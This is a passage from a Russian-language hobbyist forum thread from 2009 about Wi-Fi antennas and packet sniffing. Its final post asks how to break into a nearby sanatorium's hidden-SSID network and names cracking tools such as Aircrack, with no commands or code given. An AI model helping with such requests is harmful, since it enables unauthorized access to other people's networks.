особенно второе ,очень даже не плохо , не отступай ,и всё получится ! удачи semby68 ##
Shephard
14.06.2009, 10:44
dymka
здесь может быть еще и дело в антенне. Может размеры неточно соблюдил?
Проверь еще раз. СВЧ штука тонкая.
Я помнится тоже собрал антенну "Зигзаг" с рефлектором для Вифи, так она работала хуже чем штатная. Вот так вот...
вот запустил Airscanner Mobile Sniffer и он собирает пакеты ...так а пакеты с разных точек передаются они не перемешаются ?или сниффают только определённую точку ?
4ikotillo
15.06.2009, 07:01
вот запустил Airscanner Mobile Sniffer и он собирает пакеты ...так а пакеты с разных точек передаются они не перемешаются ?или сниффают только определённую точку ?
Снифает все что летает в воздухе, но на практике ты можешь получить данные только от открытых точек, а остальные пакеты надо будет расшифровывать, для этого надо ломать точки и узнавать ключи.
Здравствуйте уважаемые участники Форума!
Подскажите ответ на такой вопрос: можно ли взломать wi-fi сеть, в которой нет клиентов?Шифрования в сети нет,только скрытый SSID. Использовал следующие программы:CommView, Airopeek, пакет Aircrack. Однако перехватываются только Beacon(Management) пакеты, в которых нет никакой инфы( Точка доступа находится в профилактории недалеко, но из отдыхающих там видел только несколько толстых теток, которые врядли и за компьютером то сидели когда-нибудь :), поэтому если к ней подключаются, то очень редко). В теме посвященной взлому прочитал, что должен быть хоть один клиент, а как быть если точка работает "вхолостую"? Можно ли заставить удаленную точку принудительно выслать SSID и какое ПО необходимо? Сорри если повторяюсь, просто доступ в инет ограничен, не имею возможности долго искать, если что- киньте ссылку. Использую карту D-Link DWA-620 +спец. драйвера.
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot